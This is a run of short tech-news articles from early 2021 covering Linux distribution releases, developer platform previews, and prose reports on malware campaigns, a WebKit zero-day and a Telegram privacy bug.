The long awaited release of the Mandriva Linux based Mageia 8 has finally arrived, with such notable features as the new GL Vendor Neutral Dispatch (GLVND) that resolves issue with OpenGL support on Linux systems.

While Mageia is a GNU/Linux family that's available as free software which can be installed on PCs as the main operating system or as alternative to several pre-installed systems, known as dual boot.

The latest version of the software, Mageia 8 includes several new updates ranging from new packages to the latest Linux kernel to the graphical stack, and even upgraded base system.

What's New in Mageia 8 Stable Release



Besides the addition of new GL Vendor Neutral Dispatch (GLVND) that resolve issues with OpenGL support on Linux systems, Mageia ships the latest long-term support (LTS) Linux kernel version 5.10.16 that promises to provide better graphics and other core enhancements.



The new implementation of vendor-neutral libGL means that you can install Mesa and other third-party GL drivers in parallel, enabling improved performance and functionality as for hybrid GPU configurations. Also, Mageia 8 uses the video drivers for AMDGPU for newer cards, AMD/ATI graphics cards, and Radeon for older graphics cards. With other highlight features including:

  • Mesa 20.3.4
  • RPM 4.16.1.2, DNF v4.6.0
  • Glibc 2.32, GCC 10.2.1
  • LLVM 10.0.1, X.Org 1.20.10
  • LibreOffice 7.0.4.2
  • Plasma 5.20.4, GNOME 3.38, Xfce 4.16
  • MATE 1.24.2, LXQt 0.16.0, and Cinnamon 4.8.3.
  • RPM 4.16.1.2, DNF v4.6.0


Furthermore, Mageia 8 offers faster package metadata parsing using Zstd, and for UEFI boot, the rEFInd boot manager is supported as an alternative to GRUB2. The Java stack has also been upgraded to version 11, Python2 modules and other software like Iceape and PlayOnLinux have been removed in Mageia 8.

How to Download or Upgrade to Mageia 8 Stable Release



If you’re a new user to Mageia, and want to try out the latest version Mageia 8, you can download the torrent file or direct ISO image from the official page.

And for existing users who want to migrate to the latest version from previous release, there are more information about the upgrade path from Mageia 7 to 8 in the Mageia 8 release notes.

Mageia 8 Stable Release out with GLVND and better ARM support

Google has released the first Developer Preview of Android 12 after the usual release cycle and the next version of Android promises some really exciting new features, albeit the preview builds are intended for developer testing only.

While the Android 12 preview build is still highly unstable and capable of unexpected behavior, such as the UI lags and frequent app crashes, but the worst scenario that could happen is perhaps the lose of all the data on your smartphone if not properly backed up.

Below is a detailed roadmap for the Android 12 release, which also includes when all the developer previews, public beta builds and the final release will happen.

What are the Android 12 Developer Preview Phases?



The developer previews are released during the early months and these previews focus on new features and APIs for developers testing only and for making required changes after the developers must have given their feedback.



Android 12 Developer Preview phases will run from February 2021 for development and testing environments, including SDK tools, API reference, system images, and emulators. And the early baseline build will focus on developer feedback, with new features, APIs, and behavior changes, and priority window for feedback on APIs and report on any critical issues.

  • Developer Preview 1 (February)
  • Developer Preview 2 (March)
  • Developer Preview 3 (April)


Furthermore, the Developer Preview 2 is about incremental update with additional features, APIs, and behavior changes, with developers feedback and early app compatibility testing. While the Developer Preview 3 is update for stability and performance and getting apps ready for Public Betas.

Also, it includes system images for a variety of Pixel devices, including Pixel 4 / 4 XL, Pixel 3a / 3a XL, Pixel 3 / 3 XL, or Pixel 2 / 2 XL, for developing and testing.

What are the Android 12 Public Beta Phases?



The Public Beta phase is an over-the-air update to early adopters who enrolled in the Android Beta program. It involves continuous compatibility testing and feedback from Android Beta users.

And the second beta phase is more of Platform Stability milestone. With the Final APIs open for Play publishing and the final compatibility testing for apps, SDKs, and libraries.

  • Public Beta 1 (May)
  • Public Beta 2 (June)
  • Public Beta 3 (July)


The Release candidate build is the last phase of the public beta. It includes the release of compatible updates for apps, SDKs, and libraries.

The Final Release Date



The Final release for Android 12 to AOSP and the ecosystem is scheduled for Q3 2021 and includes the release of compatible updates for SDKs, apps, and libraries, with continuous work to target Android 12 build with new features and APIs.

If you are a developer and want to get started with testing the previews, you can install Android 12 on your device, or set up an emulator for compatibility testing by checking the Android 12 update page for more details.

Android 12 Roadmap: Developer Previews, Public Betas and Final Release Date

There is a sharp-rise in QuickBooks file data theft via social engineering tricks which tends to deliver malware in order to exploit the software.

While QuickBooks is a software package expressly developed for accounting by Intuit, and geared towards small and medium-sized businesses with offers like on-premises accounting applications and cloud-based versions with such facilities as managing and paying of bills, and payroll functions.

According to researchers at ThreatLocker, Cybercriminals employed new malware designed to exfiltrate data from Quickbooks and post on the Internet, with the attackers using phishing scam and social engineering tricks to deliver the malware.

How Attackers can exfiltrate data from Quickbooks



Attackers mainly use email to deliver malware to exploit the accounting software, and the method employed by attackers include sending a PowerShell command that runs inside of the email.



The attacks take the form of a PowerShell command which is capable of running inside an email, which if the recipient opens a document attached to the email, a link within that document downloads a malicious file from the internet. And once the PowerShell command is running, it enables the retrieval of the most recent Quickbooks files, and upload the file to the Internet.

Another method employed by bad actors is the running of a PowerShell command known as Invoke-WebRequests on target systems to upload relevant QuickBooks data to the Internet without having to download any malware. And as the attackers uses signed malware most of the time, it becomes even harder for antivirus or other threat detection software to detect.

These stolen data are often sold on the dark web, which according to the researchers, there are also instances where the attackers resort to bait-and-switch tactics in order to lure customers to make fraudulent bank transfers posing as suppliers.

How to Mitigate against QuickBooks File Data Theft



The attack increases exponentially when QuickBooks file permissions are set to "Everyone" group, as the attacker can now target individuals within the company, against targeting just a specific person with the right privileges.

Therefore, it is advised that users should be vigilant of these sort of attacks, and that file permissions are not set to the "Everyone" group to limit the exposure to further attacks. And if you're using a Database Server, always ensure to check the permissions on running database repairs and confirm the permissions are locked down.

QuickBooks File Data Theft via Social Engineering tricks

Offensive Security, the developer of Kali Linux has announced a new version, Kali Linux 2021.1, which is the first release for the year, with addition of new hacking tools and updated core packages.

The latest release is coming on the heels of Kali Linux 2020.4, which was the final release of 2020 series, that brought some exciting new penetration testing improvements and tools. Among the novel features in the previous update is Kali's official partnership with byt3bl33d3r, the author of CrackMapExec (CME) tool, which makes it possible for Kali Linux users to access newest changes in CME even before it is made public as the Kali package of CME now pulls update directly from its private codebase.

Kali Linux 2021.1 comes with upgraded core packages, including the Linux kernel which has been updated to its latest long-term support version 5.10 and desktop environments such as Xfce and KDE Plasma updated to version 4.16 and 5.20, respectively.

What's New in Kali Linux 2021.1 Release?



Besides the updated core packages, Kali Linux 2021.1 enables the feature of command-not-found package by default, which not only suggests that you install a package if not already installed, but also points out typo errord with correct word and the original message of “command not found” given for any invalid command not found in Kali.



And Kali Linux is teaming up with BC Security for an exclusive early access to its “Empire” (powershell-empire) and “StarKiller” and Joohoi for the renown Fuzz Faster U Fool (ffuf) tool.

Furthermore, the latest Kali Linux version has added new hacking tools, such as Chisel, Airgeddon, Arjun, GitLeaks, DumpsterDiver, and HTTProbe. Other major key updates, include: Workarounds for mate-terminal, terminator, tmux, konsole, and tilix; with upgraded BusyBox and Rucky tool to version 1.32.0 and 2.1, repsectively.

How to Download or Upgrade to Kali Linux 2021.1



If you’re an existing user of Kali Linux and want to upgrade from the previous version to Kali Linux 2021.1, you can easily upgrade your system by running the following commands:

$ echo "deb http://http.kali.org/kali kali-rolling main non-free contrib" | sudo tee /etc/apt/sources.list

$ sudo apt update && sudo apt -y full-upgrade

$ [ -f /var/run/reboot-required ] && sudo reboot -f


And for those who are new to Kali, simply grab the new Kali 2021.1 ISO images which are now available for download with support for several platforms. Also, you can download the images for ARM-based devices such as Pinebook and Raspberry Pi.

Kali Linux 2021.1 Release: New hacking Tools and Updated core packages

Web tracking has evolved over the years, with modern trackers employed to monetize behavioral user logs through intrusive data collection.

According to researchers at Cornell University, there is a new large-scale anti-tracking evasion scheme that leverages CNAME records to include tracker resources in a same-site context, otherwise known as CNAME Cloaking, which effectively helps them to bypass anti-tracking measures that use fixed hostname-based block lists.

And this tracking scheme is gaining huge traction among high-traffic websites, with several privacy and security issues inherent to the CNAME-based tracking, which the researchers detected through a combination of automated and manual analyses.

Some online trackers are already using the technique against Safari browser, which recently added strict anti-tracking systems in place.

Why Online Trackers are Switching to Evasive CNAME Cloaking Technique



The rise of cookie-killing browser barriers put in place by the major browser vendors to enhance users privacy, makes it increasingly daunting on marketers to look for new techniques to evade the anti-tracking mechanisms employed by browser vendors.



The CNAME cloaking is perhaps the latest evasive technique, whereby websites use first-party subdomains as their aliases for third-party tracking domains through the CNAME records in the DNS configuration to circumvent online tracker-blockers.

As DNS records allow for mapping a domain or subdomain to another, that is an alias, it makes them ideal means to sneak tracking code as a first-party subdomain. Thus, CNAME cloaking allows tracking code to look like first-party when it is not, with resources resolving through a CNAME that differs from the first party domain.

How the Major Browsers look to Mitigate CNAME Cloaking



Mozilla had been a major advocate of the browser-side protection that block websites from following web users online, which online tracking has been proven to benefit advertisers who target specific users, even though it invades their privacy.

Although Mozilla Firefox for now doesn't block CNAME cloaking out of the box, but users can use add-on like uBlock Origin to block any first-party tracker. But, the company has began the roll out of Firefox 86 which boasts of such privacy features as Total Cookie Protection that prevents every cross-site tracking by "confin[ing] all the cookies from each website in a separate cookie jar."

Apple on it's part has released iOS 14.4 with additional safeguards for Safari browser that build upon its ITP feature to shield third-party CNAME cloaking, albeit it does not yet offer a means to unmask and block the tracker domain.

New DNS-based Tracking Evasion employed by Advertising networks

GeckoLinux is a spinoff of openSUSE that is available as both static and rolling editions, with the Static editions based on openSUSE Leap 42.2 and the rolling edition based on the stable openSUSE Tumbleweed.

Now, the GeckoLinux team has announced a new version, GeckoLinux 999.210221, update for its openSUSE Tumbleweed-based ROLLING editions.

GeckoLinux offers out-of-the-box support for many proprietary media formats, firmware, hardware drivers, and user-installed multimedia applications, which work automatically with restricted media codecs thanks to the prioritized inclusion of the Packman repository.

What's New in GeckoLinux 999.210221 Update



GeckoLinux has continued its focus on eliminating pain points and polishing its unique out-of-the-box configuration on top of the stable and flexible openSUSE base.



While the GeckoLinux ROLLING editions use the Calamares system installer version 3.2.27, which provides easy but powerful options for reliable installation of the live system. The Linux kernel included in this current set of GeckoLinux ROLLING ISOs is version 5.10.16. Also included are the following desktop environments with additional polish in some editions:

  • Gnome 3.38
  • Cinnamon 4.8.6
  • Plasma 5.21 / Framework 5.79.0 / KDE applications 20.12
  • Pantheon (various component versions)
  • XFCE 4.16
  • LXQt 0.16
  • Mate 1.24.1


Furthermore, several components of the Pantheon desktop has been updated, along with Budgie and the Budgie desktop has been upgraded to its latest version 10.5.2 with improved behavior for Nemo desktop icons and eliminates transparency for better visibility and contrast.

How to Download or Upgrade to GeckoLinux 999.210221 Update



If you're a new user and want to give the latest version a spin, you can download the latest GeckoLinux 999.210221 update through the ROLLING edition ISO image here.

But note that GeckoLinux Rolling editions are based on openSUSE Tumbleweed and comes with offline installation live DVD / USB image.

GeckoLinux 999.210221 Update: openSUSE spinoff distro as workable alternative

Microsoft has released the first preview of .NET 6, which is a continuum of the final part of the .NET unification plan that started with .NET 5.

This next generation of Microsoft's software development platform will include major improvements across all parts of .NET, including the cloud, desktop, and mobile applications, with multiple previews for the larger scope fully available in .NET 6 builds.

The beginning of unification was emphasized by the migration of .NET Framework code and applications to .NET 5, and the laying of the groundwork for Xamarin developers to use the unified .NET platform will commence with .NET 6.0 arrival.

What’s new in Microsoft .NET 6 Preview 1



Microsoft .NET 6 first preview introduces Blazor, which is a very popular way to write .NET web apps, first supported on the server, and the browser with WebAssembly. Now, the company is extending it to enable developers to write Blazor desktop apps, and create hybrid client apps, combining web and native UI within a native client application.



It is targeted at web developers that want to offer rich client and offline experiences for their users, and coupled with the .NET Multi-platform App UI which is a modern UI toolkit that builds upon and extends Xamarin as part of .NET 6 unification.

Xamarin will enable developers to target Android, iOS, macOS, and Windows, with the .NET 6 multi-platform mobile and cross-platform support based on integrating and extending the Xamarin. And there are multiple efforts to improve containers in .NET 6, including scaling, reducing the container size, and improving startup and throughput performance.

How to Get Started with .NET 6 Preview 1



If you're a developer and want to try out .NET 6 Preview 1, you can download .NET 6 Preview 1 for Windows, macOS, and Linux. With the Installers and binaries, Container images and Linux packages, you can also check out the ASP.NET Core and EF Core posts for more detail on these components.

Microsoft .NET 6 has been tested with Visual Studio 16.9 Preview 4 and Visual Studio for Mac 8.9. It is recommended that you use those builds if you want to try out the .NET 6 preview.

First preview of .NET 6 brings a hybrid client app capabilities via Blazor

Google announced a new change coming to the open-source Chromium project, whereby it will limit access to several of Chrome application programming interfaces (API) starting from March 15, 2021.

The change was necessitated, according to Google, as a result of third-party Chromium based browsers integrating Google Chrome features, such as Chrome sync and Click to Call, which are intended only for Google’s services.

And it has such security implications that users could easily sign into their Google Account and store their personal data via Chrome sync, with just any third-party Chromium based browsers.

How the Change would impact other Chromium-based browsers



Google's plan to limit some of the Chrome APIs features that it includes inside Chromium will impact not only Chrome Sync, but also some other features such as the Chrome Translate Element, Chrome Spelling API, the Contacts API, and many more.



These APIs implemented within Chromium source code, with the open-source shell which is the base of Chrome browser, are usually removed or modified by other companies that build browsers based on the Chromium code to their own systems, over which they have control.

With the coming changes, Google has given third-party companies two months to remove every Chrome-specific APIs from their code before access is cut off. And Chromium browsers ranging from Microsoft Edge, Brave and Opera, will have to develop and implement their own to retain the specific-features.

What's the impact on Programmers and End-users?



The change will definitely affect Linux developers at multiple facet, especially, for Linux Chromium browser users to discover that the latest versions of their browsers can't perform some basic tasks.

Albeit, there is a growing mistrust between Google and Linux vendors, with the later edging closer to dumping Chromium. This latest development will leave several others with a bad taste over how Google has failed the open-source community, as it will make all Linux Chromium builds significantly less functional.

Google set to change the rules for Chromium APIs access

Devuan is a fork of Debian which instead of systemd uses sysvinit, runit or OpenRC software suites and maintains compatibility with other init systems without detachment from other Unix systems.

While Devuan GNU+Linux team has released the second snapshot of its Devuan 3 Beowulf series, Devuan Beowulf 3.1.0, which is based on the latest Debian 10 Buster. Devuan Beowulf 3.1.0 comes with a number of new features such as the installer offering three init system options on intial install, namely: OpenRC, SysV init, and Runit.

The updated installer also allows you to install any alternative bootloader in place of GRUB, along with multiple other init system choices.

What's New in Devuan Beowulf 3.1.0 Release?



Besides the updated installer, Devuan Beowulf 3.1.0 has the behavior of su utility altered, so that users can now use su - command to access root’s path or utilize the full path to commands when using only su. And for the old behavior of su utility, you should add below line to the /etc/default/su file.



Also, there are several security and bug fixes, including: linux-image-4.19.0-14 Debian 4.19.171-2 (2021-01-30), firefox-esr 78.7.0esr-1~deb10u1, lightdm 1.26.0-4+devuan1 (fixes bugs related to power buttons and accessibility features). And debian-pulseaudio-config-override will now correct the problem of pulseaudio being off by default.

Additionally, the new point version has changed the ID of the OS that previously displayed “Debian” in the boot menu to “Devuan”. You can check out the official release note for more detailed information.

How to Download or Upgrade to Devuan Beowulf 3.1.0



If you’re an existing user of Devuan Beowulf, you'll need to simply run the below command to get to the latest version:

apt-get update && apt-get dist-upgrade


But if you're new to Devuan and want to try out the latest version, Devuan Beowulf 3.1.0, you can get the ISOs, desktop-live, and minimal-live ISOs from here, which are available for i386, armhf, arm64, amd64, armel, and ppc64el platforms.

Devuan Beowulf 3.1.0: GNU+Linux forked from Debian without systemd

MassLogger is an infamous Trojan that has targeted the Windows platform, which written in .NET comes with the capabilities to go undetected by Windows Security system.

Now, there is a new variant of the Trojan, that is primarily targeted at Microsoft Outlook and Chrome users in Latvia, Turkey, and Italy which campaign started in January, and is still ongoing. First spotted in April 2020, MassLogger credential stealing capabilities has expanded to include instant messenger apps.

According to the researchers at Cisco Talos, this new campaign is aimed at stealing information from browsers and messenger apps of users in Turkey, Latvia and Italy.

How Masslogger’s new variant steals credentials from Chrome and Outlook users?



The new variant uses compiled HTML file format to start the infection chain whereby it is able to run nearly undetected by all security systems in Windows. And the infection chain appears to focus more on business users, using email as the attack vector, which email contains a RAR attachment with a compiled HTML (.chm) attachment.



While the rest of the infection chain is split between JavaScript, PowerShell and .NET; the attachments seems to adhere to the same format, a RAR multi-volume filename extension (e.g., "70727_YK90054_Teknik_Cizimler.R09") in order to bypass attempts of blocking RAR attachments using default filename extension ".rar."

The filename extension changes to RAR multi-volume filename extensions, starting with ".r00" and WinRAR or other RAR-capable unarchivers will still be able to open the file without any problems. And as the targets are mainly business users living in Turkey, Latvia and Italy, the email language is that of the targeted recipient's top-level domain.

How to safeguard against Masslogger’s new variant



As the main attack vector remains the email, it is advised that users should desist from opening any suspicious email and its attachements. And if per chance they open the email, they should not download the email attachements for any reason.

Additionally, users are advised to configure their systems for logging PowerShell events such as module loading and executed script blocks as they will show executed code in its deobfuscated format. And they should use advanced malware protection solutions such as that offered by Cisco which is a better alternative to the in-built Windows protection.

MassLogger Spyware returns in a new variant with more stealing powers

Kotlin Symbol Processing (KSP) API is an application programming interface for building lightweight compiler plug-ins in the Kotlin language.

While KSP is still in the Alpha version, the Google-developed API which is similar to the Kapt compiler plug-in for annotation processing, is faster and offers direct access to Kotlin compiler capabilities.

It is designed to obscure compiler changes and as implemented as a compiler plug-in itself, it minimizes maintenance efforts.

What the Kotlin Symbol Processing API brings to the table



The KSP API is for directly parsing Kotlin code, which reduces the build speed tax imposed by Kapt stub generation. And as Kotlin lacks a native annotation processing system, albeit annotation processors like Room for Kotlin does exist, there is a library for KSP that acts as a normal annotation processor.



During the alpha phase, it is recommended that KSP and Kapt should be maintained in separate modules. As KSP and the Kapt compiler plug-in for annotation processing, when used in the same module will likely slow down a build initially and it must be maintained in separate modules.

However, as more and more annotation processors adopt KSP, the tool will become a simple drop-in replacement for Kapt.

How to Get Started with Kotlin Symbol Processing API



If you're a developer and want early access to KSP, the source code and documentation is available on GitHub. And you can also see what KSP feels like via the KSP Playground project.

With Kotlin as a viable choice for Android app development, KSP is built with the goal of being multiplatform compatible so that it won't be tied to the JVM. The compatibility with Kotlin 1.34.0, means that KSP will act like a preprocessor framework for Kotlin programs.

Kotlin Symbol Processing API for building lightweight compiler plug-ins

Swift for TensorFlow is a Google-led project that aims to integrate the machine learning library to Apple’s Swift language; which also includes language-differentiated programming for Swift.

While TensorFlow is a popular framework for developing neural networks, and as a Google Brain's second generation system, the adoption has soared as the common platform for deep learning presents an easy to use environment and serves as a powerful contribution to the world of machine learning.

But the project to integrate the TensorFlow machine learning library and Swift language is no longer actively developed, though some parts of the project such as the language-differentiated programming for Swift remains active.

What are the accomplishments of Swift for TensorFlow?



The proponents of Swift for TensorFlow which are developers involved in the project cited in the repo a number of accomplishments, including: the enablement of a novel research combining deep learning with graphical models for 3D motion tracking through the SwiftFusion project.



And the addition of language-integrated differentiated programming into Swift, which is the part of the project that has remained in active development with the work continuing in the Swift compiler.

Furthermore, there is the spinning off of multiple open-source efforts still in active development like PythonKit, which caters for Python interoperability with Swift, and swift-jupyter for using Swift within Jupyter notebooks, along with swift-benchmark, for the benchmarking of Swift code.

What the Future holds for TensorFlow



TensorFlow was developed and released by Google in 2015, as open-source project, which opens the door for everyone including: academicians, independent researchers, students, developers and even hackers.

Google made available a version of TensorFlow for academic researchers with built-in binaries, and a version as API for developers, with the intent to build an active open-source community and through their contributions ensure improvements to the TensorFlow source code.

However, the future appears to look bleak for TensorFlow as PyTorch has been luring away its users, with the Facebook-developed PyTorch preferred over TensorFlow because of ease of use as cited by PyTorch users.

Google pulls the plug on Swift for TensorFlow project

The security firm Confiant has disclosed a malvertising campaign that exploited a zero-day vulnerability in WebKit to infect browsers with malicious payloads and thus redirect users to scan websites.

While the Apple developed WebKit browser engine powers Safari browser, and a host of other web browsers, including Google Chrome, BlackBerry Browser, and the Amazon Kindle browser.

According to Confiant, the first attack was recorded in June 2020 and leveraged on a bug that allowed any malicious third-parties to bypass the iframe sandboxing security in the Webkit browser engine to run malicious code.

How Malvertisers Exploied WebKit Zero-Day to Redirect Browser Users to Scam Sites?



ScamClub, a malvertising group exploited how WebKit handles JavaScript event listeners, which flaw makes it possible to break away from the sandbox associated with the inline frame element irrespective of the "allow-top-navigation-by-user-activation" attribute that forbids redirection unless a click event occurs within the iframe.



The bug tracked as (CVE-2021–1801) could allow malicious third-parties to bypass the iframe sandboxing policy in the WebKit browser engine that powers Apple Safari and Google Chrome for iOS to run malicious code.

Over the past 90 days, ScamClub has successfully delivered over 50MM malicious impressions, maintaining a low baseline of activity augmented by frequent manic bursts, with as many as 16MM impacted ads being served in a single day, according to Confiant.

And ScamClub malvertisements are mainly defined by forced redirections to scam sites that offer prizes to “lucky” users, such as the all too ubiquitous “You’ve won a Walmart giftcard!” or “You’ve won an iPhone!” pages.

Why Google SafeBrowsing and other browser-based security isn't Enough



Google SafeBrowsing was pretty late in reporting the landing pages as malicious, as the domain used in the scheme has been flying under the radar and not detected by Google SafeBrowsing.

However, Apple has issued a patch for WebKit with improved iframe sandbox enforcement as part of the latest security updates released for iOS 14.4 and macOS Big Sur, thus addressed the issue.

WebKit Zero-Day Vulnerability Exploited by Malvertisers to Scam Users

Apple brought a number of countermeasure to prevent attacks with iOS 14.4 update, such as the introduction of a sandboxed 'BlastDoor' feature for the parsing of untrusted data in iMessage.

Now, the company has gone a bit harder on the bad actors, with iOS 14.5 update, which will introduce fraudulent website check for Safari browser, which also passes traffic through its own proxy servers to prevent leaking of IP addresses and protect users' privacy.

The "Fraudulent Website Warning" feature will alert users about any dangerous website that have been previously blacklisted or reported as malicious, deceptive, or harmful.

How the Safari browser Fraudulent Website Alert will work?



Apple will rely on Google Safe Browsing, which is a blacklist service that offers a list of web resources that contain malicious or phishing content, against a hash prefix calculated from the addresses and checked for fraudulent activities.



The database will then prompt Safari browser to request for the full list of URLs that correspond to the hashed prefix, and subsequently, block access to the site with a warning to the user. While this approach will ensure that the actual website the user is trying to visit is never shared with the safe browsing provider, but it will definitely leak the IP address of the device.

Albeit, Safari will proxy the Fraudulent Website Alert service through Apple servers to limit the risk of information leak.

Additional Privacy measures that Apple will be rolling out



Apple will also require that apps request for users' permission before tracking them in iOS 14.5 and websites using the device's ad identifier as part of App Tracking Transparency.

The new anti-tracking features has been seen as a big hit in the ad revenue generated by internet marketers and those that rely on cross-device user tracking and the resulting ad revenue generation to continue their offering of free services.

Fraudulent Website Alert coming to Safari browser with iOS 14.5 update

ConnectWise Control, formerly known as ScreenConnect, is a self-hosted remote desktop application with support for automatic access and ability to hold meetings with screen-sharing capabilities.

While a state-sponsored hacking group, called Static Kitten (also known as Seedworm, MERCURY or MuddyWater) which is believed to be working at the behest of Iran's primary intelligence and military service, Islamic Republic Guard Corps, is behind attacks on UAE and Kuwait government agencies in a new cyberespionage campaign.

According to Anomali Threat Research, this cyberespionage campaign uses tactics, techniques, and procedures (TTPs) that has been consistent with Static Kitten activity, with ConnectWise Control parameters designed to target the Ministry of Foreign Affairs (MOFA) of Kuwait with mfa[.]gov as part of the custom field.

How the attacks on UAE and Kuwait Government Agencies were tied to Static Kitten?



In October 2020, Static Kitten reportedly conducted Operation Quicksand, which was targeted at prominent Israeli organizations, including the use of file-storage service OneHub. In the current campaign, Anomali discovered samples specifically masquerading as the UAE National Council and Kuwaiti government respectively, based on references in the malicious samples.



The lure ZIP files discovered as being used by Static Kitten was designed to trick users into downloading a report purportedly on relations between Arab countries and Israel, or scholarships. And the URLs distributed with these phishing emails direct recipients to the file storage location on Onehub, a service known to be previously used by Static Kitten.

Anomali Threat Research also identified that Static Kitten has continued to use OneHub to host files containing ScreenConnect.

The Rise of Utilizing legitimate software for malicious purposes



Static Kitten has been using features of ScreenConnect to steal sensitive information or download malware for cyberespionage operations. And the use of legitimate software for malicious purposes is on the rise, which can be an effective method for threat actors to obfuscate their operations.

In this latest campaign, Static Kitten is focused on cyberespionage, and very likely data-theft is the primary objective behind the propagating of ScreenConnect.

Hackers using ConnectWise Control to Spy on Middle East targets

Telegram messages aren't end-to-end encrypted by default, except of course the user explicitly enables a device-specific feature called "secret chat" which also keeps the data encrypted on Telegram servers.

However, Dhiraj Mishra, a security researcher discovered a bug in Telegram version 7.3, albeit the issue has been fixed in subsequent version 7.4, released on January 29. The privacy-bug resides in its macOS app and makes it possible to access any self-destructing audio and video message long after disappearing from secret chat.

While there are several security and privacy measures in Telegram, but it fails again in terms of securing the users data.

How Self-Destructing Media Files still remains On Device after end of Secret Chat



If a Telegram user records and sends a video or audio message through the regular chat, the Telegram app leaks the exact path where the message is stored in an ".mp4" format and the path information isn't revealed if the secret chat option turned on, but the recorded message is stored in the same location.



And the person that receives a self-destructing message in a secret chat will have the multimedia message accessible on the system even after the message has gone from the chat screen.

In the proof-of-concept video the user receives self-destructed message in secret chat, which is stored even after the message has self-destructed. The version of the app for macOS is what is susceptible to the vulnerability and also stores passcode in plain text. Both the vulnerabilities were patched in version 7.4 (212543) Stable with a €3,000 bounty awarded to Dhiraj Mishra.

What Telegram users should do about the Vulnerabilities



If you're a Telegram user on macOS and cares about your privacy, you should update your app now to Telegram version 7.4 (212543) Stable, but bear in mind that that group chats still offer no end-to-end encryption with all default chat histories stored on Telegram's servers.

Therefore, if you want a truly private group chat, you should consider Signal Messenger as an alternative with all chats end-to-end encrypted. But, despite the privacy shortcoming, Telegram still recorded a milestone of 500 million active monthly users in January.

Telegram Bug leaves Self-Destructing Audio and Video messages on Device

Java Development Kit (JDK) 16 is due for release in March 2021, and the next upgrade Java 17 has already started to take shape, with the proposal of enhanced Pseudo-random number generators (PRNGs).

As part of Java Development Kit (JDK) 17, the Java 17 proposal would provide new interface types for PRNGs including jumpable PRNGs and implementations of an additional class of splittable PRNG algorithms (LXM).

The new interface, dubbed RandomGenerator, would provide a uniform API for all new and existing PRNGs.

What's the goal of the enhanced Pseudo-random number generators?



The goal is to focus on multiple areas of improvement in the plan of pseudo-random number generation in Java, which effort doesn't necessarily call for implementations of numerous other PRNG algorithms.



With four specialized RandomGenerator interfaces to be provided, the overriding goals of the plan include:

  • Eliminating code duplication in existing PRNG classes
  • Providing streams of PRNG objects with improved support for stream-based programming
  • Using various PRNG algorithms interchangeably in applications with ease


Furthermore, there is the preservation of existing behavior of class java.util.Random, albeit, three common algorithms have also been added that are already widely deployed in other programming language environments.

What features to Expect in JDK 17?



The main features proposed for JDK 17 include foreign linker API and a foreign-memory access API, with a vector API, which are currently in incubator stage in the JDK 16. Also, in second preview in JDK 16 is Sealed classes, which could become generally available in JDK 17.

If you are a developer and want an early-access open source builds of JDK 17, you can get it at jdk.java.net. But note that JDK 17 is not due until September, and as the next long-term-support (LTS) release, it would receive several years of support. Other Java releases will serve as feature releases, and supported for only six months.

JDK 17: Java 17 proposal of enhanced Pseudo-random number generators

Loda Windows remote access Trojan (RAT), which was formerly a Windows only malware, has expanded its scope to include Android devices in furthering the attacker's credential-stealing motives.

According to researchers at Cisco Talos, there is a new iteration of LodaRAT identified with improved sound recording capabilities, deployed in an ongoing hybrid campaign targeting Bangladeshi users that started in October 2020. While the malware is typically delivered via phishing lures with capabilities to record audio, video, and even capture other sensitive data; the new variants aims at stealing users passwords via web cookies from browsers.

Along with the new LodaRAT for Android variant, there is an updated version of Loda for Windows identified in the same campaign.

What has changed in the New Variants of LodaRAT for both Windows and Android?



The latest variants, Loda4Android and Loda4Windows, are much related as they come with a set of data-gathering features which constitute an espionage application.



But, the Android varinat is a bit different from other such android malware, as it tends to avoid some common techniques employed by other such banking Trojans, such as the abusing of the Accessibility APIs to record on-screen activities of users. Albeit, the Android variant can take photos and screenshots, and also read and send SMS and even initiate calls to specific numbers, and intercept phone calls.

The latest Windows counterpart, on the other hand, comes with some new commands that enable it to remotely access the target machine via Remote Desktop Protocol (RDP) and commands that makes use of BASS audio library by capturing audio from connected microphones. And there are multiple commands in Loda which have been updated and some that are entirely new, with the most notable of the commands giving the threat actors remote access to target machine via RDP.

Also, the malware contains a command-and-script-running capability, which avails the malware flexibility to perform a range of tasks, like downloading any of the available Android exploits and obtain root access, or downloading a new APK and installing it.

How to Safeguard against such Android Banking Trojans



LodaRAT has diversifying its target platforms and it's continuously improving in capabilities. Along with these lines, the threat actor has focused on specific targets, and deploying a cross-platform malware with additional capabilities, which suggests they have their eyes on targeting larger organizations.

Therefore, it is recommended that Windows and android users should to be vigilant when clicking on or opening links received via email or SMS message. And also note that the attackers has made use of squatted domains to preserve some legitimacy, which made them to look familiar to the real domains to lure users in without noticing.

LodaRAT now Targets Android with Credential-stealing capabilities

Finnix is a Debian GNU/Linux based Live CD operating system, intended for use by system administrators for such tasks as network monitoring, filesystem recovery and OS installation.

While the Finnix team has announced a new version of the Linux distro, Finnix 122, with new packages, security fixes, and several new feature updates. The new version follows on the heels of version 121, which was built on top of Debian 11 “bullseye” - the latest version 122 is based on Debian 11 testing distribution with the latest long-term support (LTS) Linux Kernel 5.10.

What's New in Finnix 122 Release?



Finnix 122 features the latest long-term support (LTS) Linux Kernel 5.10, including a number of fixes, new packages and new features, as follows:



  • Wireless-regdb
  • iozone3 (finnix/finnix#8)
  • Wifi-connect helper script added
  • USB flash drive boot compatibility improvements on older BIOSes
  • Manpage cache generated for man -k/apropos (finnix/finnix#9)
  • Increased boot splash timeout from 15 seconds to 30 seconds
  • Redesigned boot splash screen


Furthermore, Finnix 122 ISO size has reduced from 509MB to 411MB with improved boot speed. And it has added finnix command to help users easily get started with the operating system.

How to Download or Upgrade to Finnix 122



If you're a new user and want to try out Finnix 122, you can download the ISO image from the official download page, and note that it is available for only 64-bit architecture of several platforms, including User Mode Linux, x86, PowerPC, and Xen.

However, if you are running a 32-bit 586/686/PowerPC system, you can only use older versions of Finnix.

Finnix 122 Release: Debian-based LiveCD Linux Distro for System Administrators

Microsoft has launched what it calls Speller100, which is a large-scale multilingual spelling correction models for Bing Search worldwide with high precision and high recall rate in over 100 languages.

According to Microsoft, Bing records about 15% of queries submitted by customers having misspellings, and when queries are misspelled, the search engine normally matches the wrong set of documents and trigger incorrect answers, which can produce a sub-optimal results page for web searchers.

Therefore, Speller100 serves to correct this search anomaly so that there will be better misspell handling in more languages from around the world with the help of AI at Scale.

How Speller100 will improve searches in more than 100 languages in Bing?



Microsoft's large-scale multilingual spelling correction models has high recall in over 100 languages with high precision, and these models, called Speller100, are meant to help in improving search results in Bing.



It's a huge step forward for search generally, especially as considering that spelling correction has only been available for a few dozen languages. The Speller100 model leverages on advances in AI, particularly zero-shot learning coupled with carefully designed large-scale pretrained tasks, and historical linguistics theories.

